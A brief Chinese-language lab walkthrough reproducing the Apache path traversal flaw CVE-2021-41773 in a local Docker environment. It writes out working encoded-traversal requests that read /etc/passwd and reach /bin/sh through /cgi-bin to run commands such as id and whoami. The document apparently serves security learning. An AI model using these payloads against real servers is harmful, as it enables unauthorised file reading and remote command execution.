CVE-202141773目录遍历(文件穿越)漏洞
Linux环境下
进入CVE-202141773漏洞环境文件夹,执行docker-compose up -d启动漏洞环境。
等待文件下载……
安装完成后重启服务
访问本地的8080端口
打开Burpsuite,构造get参数
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
转换为post参数
修改命令为POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
echo Content-Type: text/plain; echo; id
查看id
whoami
